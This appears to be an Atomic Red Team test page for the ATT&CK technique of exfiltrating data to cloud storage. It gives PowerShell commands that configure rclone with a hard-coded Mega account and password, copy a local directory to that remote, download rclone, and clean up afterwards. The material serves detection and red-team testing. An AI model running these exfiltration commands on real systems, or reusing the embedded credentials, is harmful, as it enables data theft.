Try it using Invoke-Atomic

Exfiltration Over Web Service: Exfiltration to Cloud Storage

Description from ATT&CK

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.

Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

Atomic Tests

Atomic Test #1 - Exfiltrate data with rclone to cloud Storage - Mega (Windows)

This test uses rclone to exfiltrate data to a remote cloud storage instance. (Mega) See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/

Supported Platforms: windows

auto_generated_guid: 8529ee44-279a-4a19-80bf-b846a40dda58

Inputs:

Name Description Type Default Value
rclone_path Directory of rclone.exe Path $env:temp\T1567.002\rclone-v*\
rclone_config_path Path to rclone's config file (default should be fine) path $env:appdata
dir_to_copy Directory to copy String $env:temp\T1567.002
mega_user_account Mega user account String atomictesting@outlook.com
mega_user_password Mega user password String vmcjt1A_LEMKEXXy0CKFoiFCEztpFLcZVNinHA
remote_share Remote Mega share String T1567002

Attack Commands: Run with powershell!

1
2
3
4
5
6
7
New-Item #{rclone_config_path}\rclone -ItemType directory
New-Item #{rclone_config_path}\rclone\rclone.conf
cd #{rclone_path}
.\rclone.exe config create #{remote_share} mega
set-Content #{rclone_config_path}\rclone\rclone.conf "[#{remote_share}] `n type = mega `n user = #{mega_user_account} `n pass = #{mega_user_password}"
.\rclone.exe copy --max-size 1700k #{dir_to_copy} #{remote_share}:test -v

Cleanup Commands:

1
2
3
4
5
6
7
8
cd #{rclone_path}
.\rclone.exe purge #{remote_share}:test
.\rclone.exe config delete #{remote_share}:
Remove-Item #{rclone_config_path}\rclone -recurse -force -erroraction silentlycontinue
cd c:\
Remove-Item $env:temp\rclone.zip
Remove-Item $env:temp\T1567.002 -recurse -force

Dependencies: Run with powershell!

Description: rclone must exist at (#{rclone_path})

Check Prereq Commands:

1
2
if (Test-Path #{rclone_path}) {exit 0} else {exit 1}

Get Prereq Commands:

1
2
3
Invoke-WebRequest "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile $env:temp\rclone.zip
Expand-archive -path $env:temp\rclone.zip -destinationpath $env:temp\T1567.002\ -force

source